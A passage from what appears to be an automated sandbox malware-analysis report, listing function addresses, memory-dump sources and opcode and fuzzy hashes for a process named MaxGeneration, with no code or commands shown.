                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ba6d151b6f02f9fbf612a57151dfd492032b93bf8591297d70507be968890f7
                                                                        • Instruction ID: e5d8637da9cc071d0d0f8fb7be1e253b43d4749b7f56c5149424c43ec508d51e
                                                                        • Opcode Fuzzy Hash: 5ba6d151b6f02f9fbf612a57151dfd492032b93bf8591297d70507be968890f7
                                                                        • Instruction Fuzzy Hash: 03F0A4329502159BCB15CB74C455AEFBBB6AF84304F04842AC402A7244DE70554BCBC2
                                                                        Function 05468B72 Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3422601c7027d8df2a6fe9ab73a73f095cf43edcea589dae648b4db9687efb33
                                                                        • Instruction ID: 4d2574d3576c243005319f2a51c61c984608d2f4ff8c425d88f42abceb25808f
                                                                        • Opcode Fuzzy Hash: 3422601c7027d8df2a6fe9ab73a73f095cf43edcea589dae648b4db9687efb33
                                                                        • Instruction Fuzzy Hash: B211B07094022ACFDB24CF14C954BE9B7F6BB49308F0144EAD009AB282DB71AE85DF45
                                                                        Function 0546758A Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ff18c064f3b66da081860eca2b1936c3f700ec0dce91ff68af1da8703911aa97
                                                                        • Instruction ID: eb30440181302355d1e6d339c2659cfdf8fd98ccf35ec8905f82b17468e617d3
                                                                        • Opcode Fuzzy Hash: ff18c064f3b66da081860eca2b1936c3f700ec0dce91ff68af1da8703911aa97
                                                                        • Instruction Fuzzy Hash: 06F0BE3550810CFBCB00DFA0D840AE9BB76FB45314F1091D9FC0923360CB369A62EBA2
                                                                        Function 07F09106 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 407e974c9fd7acb60dcc870e3cee468d58db7887e4a0f896d05f1399650da42b
                                                                        • Instruction ID: 63814a43fb28447f12818c8c1e1d2b63a1045785ef022319d203ff4a43213f71
                                                                        • Opcode Fuzzy Hash: 407e974c9fd7acb60dcc870e3cee468d58db7887e4a0f896d05f1399650da42b
                                                                        • Instruction Fuzzy Hash: DB11B7B4A1422A8FDB65DF58C8886E9B7F5FB49700F9080E9D80DA3744EF349E859F00
                                                                        Function 05469518 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09445be83fcfa0b45671ac8c75a2b85ac961b5c83380d93eeffdb643e31c4c85
                                                                        • Instruction ID: a5ac8d7241e469efc339ab6b17400662abb507de4439a546cc12448f016de9d8
                                                                        • Opcode Fuzzy Hash: 09445be83fcfa0b45671ac8c75a2b85ac961b5c83380d93eeffdb643e31c4c85
                                                                        • Instruction Fuzzy Hash: 13F0C93190420AEBCF01DF99D8009EEBB75FF89324F00C559E95827250D771A6A6DB91
                                                                        Function 05466742 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e423450c125697c61064b77bb4367ace7ed27c2294aeda72883fa6e499a62bda
                                                                        • Instruction ID: f97123210bf21b55eda6c75f90682c36dd8eb2ea294a63a58b8bd0e02faa5378
                                                                        • Opcode Fuzzy Hash: e423450c125697c61064b77bb4367ace7ed27c2294aeda72883fa6e499a62bda
                                                                        • Instruction Fuzzy Hash: B5F0E27494510CEBC700DBA4D5407ECBBB8EB45201F1081EADC0893391DA369A02D782
                                                                        Function 07F07BDD Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b2e6f406fee9ae07571dc724b7efb9ff2f52f9599b822d0678456020921b7ad
                                                                        • Instruction ID: 038fdd8eef90967e78b9840eaee66108c8a472356eaae90de08ed6484c3c6b48
                                                                        • Opcode Fuzzy Hash: 5b2e6f406fee9ae07571dc724b7efb9ff2f52f9599b822d0678456020921b7ad
                                                                        • Instruction Fuzzy Hash: 8B017CB4A102198FDB50DF59E848ADEB3B9FB89700F1080E8E81DA7755CB349E80CF10
                                                                        Function 05467E40 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c03dbea995a5810e2eaa00bc6060372c3943d1cb0697371551a437145f2c2b3
                                                                        • Instruction ID: 722b8ec9461f2ad03c3fd7f8e0f5f6ce692f724f97c5077a11d8aa7a959f62ba
                                                                        • Opcode Fuzzy Hash: 3c03dbea995a5810e2eaa00bc6060372c3943d1cb0697371551a437145f2c2b3
                                                                        • Instruction Fuzzy Hash: 5BF08C39A48108EBDF04DF90D880BEDBB75FB05314F24916AEC4562350D732AE66EB51
                                                                        Function 0546A109 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e33da2f5fe45877ef2134875b628a10ae89e098c6a11ef502cf5d478d14d1fb4
                                                                        • Instruction ID: 4942121a196790fe073e6fb28fb28f4df0e5bbffe1d42d3afae52f26f759fa32
                                                                        • Opcode Fuzzy Hash: e33da2f5fe45877ef2134875b628a10ae89e098c6a11ef502cf5d478d14d1fb4
                                                                        • Instruction Fuzzy Hash: 07F05438909288EFCB42CFA4D810AECBFB5EB45310F14C0DBEC9467352D6315A51DB52
                                                                        Function 05466B2F Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65594c84a273340fbad435a064201b5d229aa4d82f9676a8ddab7fad14556a7d
                                                                        • Instruction ID: 6495ab3a914d063e9e431da9138631a0e6e8cc742b15137bf174c61a72a74731
                                                                        • Opcode Fuzzy Hash: 65594c84a273340fbad435a064201b5d229aa4d82f9676a8ddab7fad14556a7d
                                                                        • Instruction Fuzzy Hash: 0901F6B4E05108DFDB24DFA9D590A9DBBB2FB89700F21816ED505A3345DB306D41CF41
                                                                        Function 032709A8 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8920ab2a486c186afb7413bd73e7562a9789fc2e29f0ffd10cad77ff7bc4fba0
                                                                        • Instruction ID: 34adf10314d5cd3273ca0dbc84ecf6936c7352c8fed2ca854514e83c564d4abb
                                                                        • Opcode Fuzzy Hash: 8920ab2a486c186afb7413bd73e7562a9789fc2e29f0ffd10cad77ff7bc4fba0
                                                                        • Instruction Fuzzy Hash: 00F06DB1915241DFDB02CB24C958B687BB0EF56314B1444CDD441CB2A2D77A5885CF01
                                                                        Function 0327F258 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fd63a6b8473f21834124974cea133a5f37ff416750efc530cf2a6599912e42c
                                                                        • Instruction ID: 61e118076f61ba7fc7a460d8c8f9c832d0d66fa1e5fea5a3661155ddedf9ca0b
                                                                        • Opcode Fuzzy Hash: 9fd63a6b8473f21834124974cea133a5f37ff416750efc530cf2a6599912e42c
                                                                        • Instruction Fuzzy Hash: 06F08234918248BBCB51CB94E5405ACFF74AB45314F14809AEC9427241C7315792EB95
                                                                        Function 0546AE29 Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7c8d9060660790215c969afd26ac0fd35074b8df49bd1d75370245f4aae7a4d
                                                                        • Instruction ID: 967bad5b6ff37f277264ab17a7ee1e4305b42a4698bfc21ad5bbbd6c27b6061d
                                                                        • Opcode Fuzzy Hash: a7c8d9060660790215c969afd26ac0fd35074b8df49bd1d75370245f4aae7a4d
                                                                        • Instruction Fuzzy Hash: 3EF05874909348EFCB01CBA5D8006A8BFB5EB46214F14C1EEE844A7352D6369A46EB55
                                                                        Function 054641AC Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e29f9561ad22eba7b16bc8e2f579b6024a89c9e84ac8ecbd97b4d268cef03e12
                                                                        • Instruction ID: 504335d12c6c6cc668b79218c76f08ce7faf13ac4c84d4e14a56ad719e97f492
                                                                        • Opcode Fuzzy Hash: e29f9561ad22eba7b16bc8e2f579b6024a89c9e84ac8ecbd97b4d268cef03e12
                                                                        • Instruction Fuzzy Hash: 1FF0F47990A229DFEB60CF68C599BE87BF5FB09711F1040E6D109A2202D7789AC68F11
                                                                        Function 05461C60 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54ab1e0ffb4172d61858fe5a0fdfef8a7d435c0d13a92e7321a572ae37ae25e7
                                                                        • Instruction ID: 16a74f8946de41a3bfd069cf630117be9cd9b6d88fe998bd81a2c252ba7f74c3
                                                                        • Opcode Fuzzy Hash: 54ab1e0ffb4172d61858fe5a0fdfef8a7d435c0d13a92e7321a572ae37ae25e7
                                                                        • Instruction Fuzzy Hash: 6CE06D34909108ABC704CFA4E8817A9BFB4EB41310F1091AAE80997390DA719D42DB92
                                                                        Function 05466FA0 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: afc6a703ea1dcbe7ba665f70a4a85474285dda5b1128e47584c1efa6ed90d837
                                                                        • Instruction ID: 1bce71baffa68292ff8b96e6c8bafe7bd21cea7aa9118a0fa8dcb93db0a43858
                                                                        • Opcode Fuzzy Hash: afc6a703ea1dcbe7ba665f70a4a85474285dda5b1128e47584c1efa6ed90d837
                                                                        • Instruction Fuzzy Hash: D1E039B4D09149EBC744DA94D4817ACBBB4AB44204F14C0AAE808A7385D7319B02DB82
                                                                        Function 05465910 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6b8b4ef1bcee079545f1065a914d2470886e822eaf8a5d015675c5029b9f040
                                                                        • Instruction ID: 784d70c19724491816e85a4508aabb9e016faad5ec6dc29e1796ff87e0c473ac
                                                                        • Opcode Fuzzy Hash: c6b8b4ef1bcee079545f1065a914d2470886e822eaf8a5d015675c5029b9f040
                                                                        • Instruction Fuzzy Hash: DDE0D878508108E7C704DEA4D8817ECBB75FB45324F209199AC4923341C6356E07DB55
                                                                        Function 0546C369 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c38fc711f9c1db8ee522f05d1a6134dbc3124a2a4b4fb6d12feea9ab3235631
                                                                        • Instruction ID: 1b058548f8427d9b8595b204fa3c996abd113cd5be0378240803e3cee7c1f2d8
                                                                        • Opcode Fuzzy Hash: 7c38fc711f9c1db8ee522f05d1a6134dbc3124a2a4b4fb6d12feea9ab3235631
                                                                        • Instruction Fuzzy Hash: F4E0D83850810CE7C744CA94DD85BECBB79EB40305F14C299DC4963340CB319E42DB85
                                                                        Function 0327E940 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d786e9482b82657e68047f26349c79aac87f362a998e4d1f416e8ebcd6a69c18
                                                                        • Instruction ID: cdb9ee3843ada5e7ac851276a1a1985b5923464bbadd59855feaef6bde2390cf
                                                                        • Opcode Fuzzy Hash: d786e9482b82657e68047f26349c79aac87f362a998e4d1f416e8ebcd6a69c18
                                                                        • Instruction Fuzzy Hash: 77F0E5B590D348ABC745DBA4D4416ACBFB8AB09300F04C0DAE88467282C6309A81DBA1
                                                                        Function 054609F1 Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ff0d33fcc7674a59cceee71b4486f903dc10e7ba6e16bac76c695fab3d26231
                                                                        • Instruction ID: 3e30b7e2fc64264a215f8012113751525894e3e7a6c450d613b7552ccae532e5
                                                                        • Opcode Fuzzy Hash: 6ff0d33fcc7674a59cceee71b4486f903dc10e7ba6e16bac76c695fab3d26231
                                                                        • Instruction Fuzzy Hash: B6E0D87890910CABC704CE94E4857E8B7B4EB55315F1491E99C0923341CA355947DB81
                                                                        Function 0546B891 Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a833479ebfc6b7282971e54c2267778c447ade7f0b2cca3a805cb8fd16f7370a
                                                                        • Instruction ID: 52adf43acc06654a5b1191b2e2851dc0ad2e3d4aa9d35f2423781b4674a83b1e
                                                                        • Opcode Fuzzy Hash: a833479ebfc6b7282971e54c2267778c447ade7f0b2cca3a805cb8fd16f7370a
                                                                        • Instruction Fuzzy Hash: CEF0653450D288AFC701DBF4D8505D87F72AB46214F14C0DFD8489B393C6718A86C782
                                                                        Function 05466AC3 Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5314ee616c937032aa42d089f90e0bea0aca7bbb4210718ff262868289e6a5b9
                                                                        • Instruction ID: 407a201e3bc0274249bc4650541a68dd90b41f35b318400c622f2b16a2e88cc3
                                                                        • Opcode Fuzzy Hash: 5314ee616c937032aa42d089f90e0bea0aca7bbb4210718ff262868289e6a5b9
                                                                        • Instruction Fuzzy Hash: FBF0F978D01118EFEB54DF54E890B9DBBB2FB49300F50819AE449A3344DB345E85CF52
                                                                        Function 05461540 Relevance: .0, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 714b2866f8166c629fc56dde29edb56e0f5b97275595f316a1868de2470a495f
                                                                        • Instruction ID: e55e80dd090005a761798707e7b2aba4b93aef86404ded45d47ec50c13b47ec1
                                                                        • Opcode Fuzzy Hash: 714b2866f8166c629fc56dde29edb56e0f5b97275595f316a1868de2470a495f
                                                                        • Instruction Fuzzy Hash: 73E0927490D248ABCB40DBA8E9416A9BF74EB42304F1491DED849173A2C6315A42DB82
                                                                        Function 0546972A Relevance: .0, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 149f135bcaf1688a2775b98ccf53e05a6770441d1ed011475e10b8d5358bd466
                                                                        • Instruction ID: e3cff26123aac96b92557201a13ac9209c4fef9fc7cae797846aa4f289a0fa4f
                                                                        • Opcode Fuzzy Hash: 149f135bcaf1688a2775b98ccf53e05a6770441d1ed011475e10b8d5358bd466
                                                                        • Instruction Fuzzy Hash: CDF0B274904218DBDBA0DF24C890AD9B7B5EB89300F5081EA880DA7344DB346E858F81
                                                                        Function 05466092 Relevance: .0, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 485b6c825174e9020f762cf32406d473b366551be736cb9b62620043372be9a5
                                                                        • Instruction ID: 7a1364231e1e5f52c10deee29bef6b60a62f22d98180202c167063a33b2e3238
                                                                        • Opcode Fuzzy Hash: 485b6c825174e9020f762cf32406d473b366551be736cb9b62620043372be9a5
                                                                        • Instruction Fuzzy Hash: AAE092345092089BC701DBA8E4807ACBF78EB41314F1481EAD84417341C7325A16DB42
                                                                        Function 05467598 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a88aa093cabdec686bd647fdfc5ea27bb5b1b923f32a1aa3b54aadf37e3ef026
                                                                        • Instruction ID: 83305446917f4d8fdb24ac156dd25be388c731e1a27162b4797702bc53754599
                                                                        • Opcode Fuzzy Hash: a88aa093cabdec686bd647fdfc5ea27bb5b1b923f32a1aa3b54aadf37e3ef026
                                                                        • Instruction Fuzzy Hash: 9BE0E53590910CEBCB05DFA4E940AEDBB76FB49314F10D19AFC0527351C7329AA2EBA1
                                                                        Function 0546BF18 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0013fe026d5fa23241b81ba5807833647c18edd5a1ba89d82275dee943e2d27a
                                                                        • Instruction ID: f4a23a11726839dc3b755d645067ccaf95edd9bb5d6f67062de9cf8224b7a674
                                                                        • Opcode Fuzzy Hash: 0013fe026d5fa23241b81ba5807833647c18edd5a1ba89d82275dee943e2d27a
                                                                        • Instruction Fuzzy Hash: A8E0C2B5509109ABC3E8CA94D942BE6B778E705664F1890D9E808D73D1EA329E02CBC2
                                                                        Function 05467E50 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a88aa093cabdec686bd647fdfc5ea27bb5b1b923f32a1aa3b54aadf37e3ef026
                                                                        • Instruction ID: f4ef282c06421b578950a1e64404769ff37f6e2caac960683e5e6e3eeb967a59
                                                                        • Opcode Fuzzy Hash: a88aa093cabdec686bd647fdfc5ea27bb5b1b923f32a1aa3b54aadf37e3ef026
                                                                        • Instruction Fuzzy Hash: FAE0393490810CEBCF04CF94D8409ADBB75FB48304F108099AC0422350C7329A61EB41
                                                                        Function 05465E3A Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f21e747e58ef18ea20e8ab483a89de5f1c28cfd60d479e98e6c4355a110165df
                                                                        • Instruction ID: 1c79c72de7bca11bba42922787071bb3cafefc5c1ce5edc9dbf115bc43f7a159
                                                                        • Opcode Fuzzy Hash: f21e747e58ef18ea20e8ab483a89de5f1c28cfd60d479e98e6c4355a110165df
                                                                        • Instruction Fuzzy Hash: 0BE086F258510CFBDB00EBF4C801BDE77F8EB45304F0065A99909A7250EE3A9B04AB96
                                                                        Function 0546A118 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f318e75800d27efcf87c375fb78660d4c75d07855da6131e1551a73b1bd70281
                                                                        • Instruction ID: 8800ce730bf3a1cfde1e54d43f7c27ca40ab1f8bc6ddc0c970d271d880168559
                                                                        • Opcode Fuzzy Hash: f318e75800d27efcf87c375fb78660d4c75d07855da6131e1551a73b1bd70281
                                                                        • Instruction Fuzzy Hash: 4BF0C93490920CEFCB45DF95D840AEDBBB5FB48310F14C19AEC5466351D7329A51EB81
                                                                        Function 07F1BEE0 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c9245172868e425f60499528265c6120a0cc3b3a1ef800eb285fbc2fb286fa9
                                                                        • Instruction ID: 6322ebb76ed0e1a91bc99495a8c277005fe63ae52ad2042b3291f839e40bfcb9
                                                                        • Opcode Fuzzy Hash: 2c9245172868e425f60499528265c6120a0cc3b3a1ef800eb285fbc2fb286fa9
                                                                        • Instruction Fuzzy Hash: 5FE0EDB4E0520CEFCB84DFA8D441A9CFBF5EB48310F14C1A9A818A3350D7319A51DF85
                                                                        Function 07F161D0 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c9245172868e425f60499528265c6120a0cc3b3a1ef800eb285fbc2fb286fa9
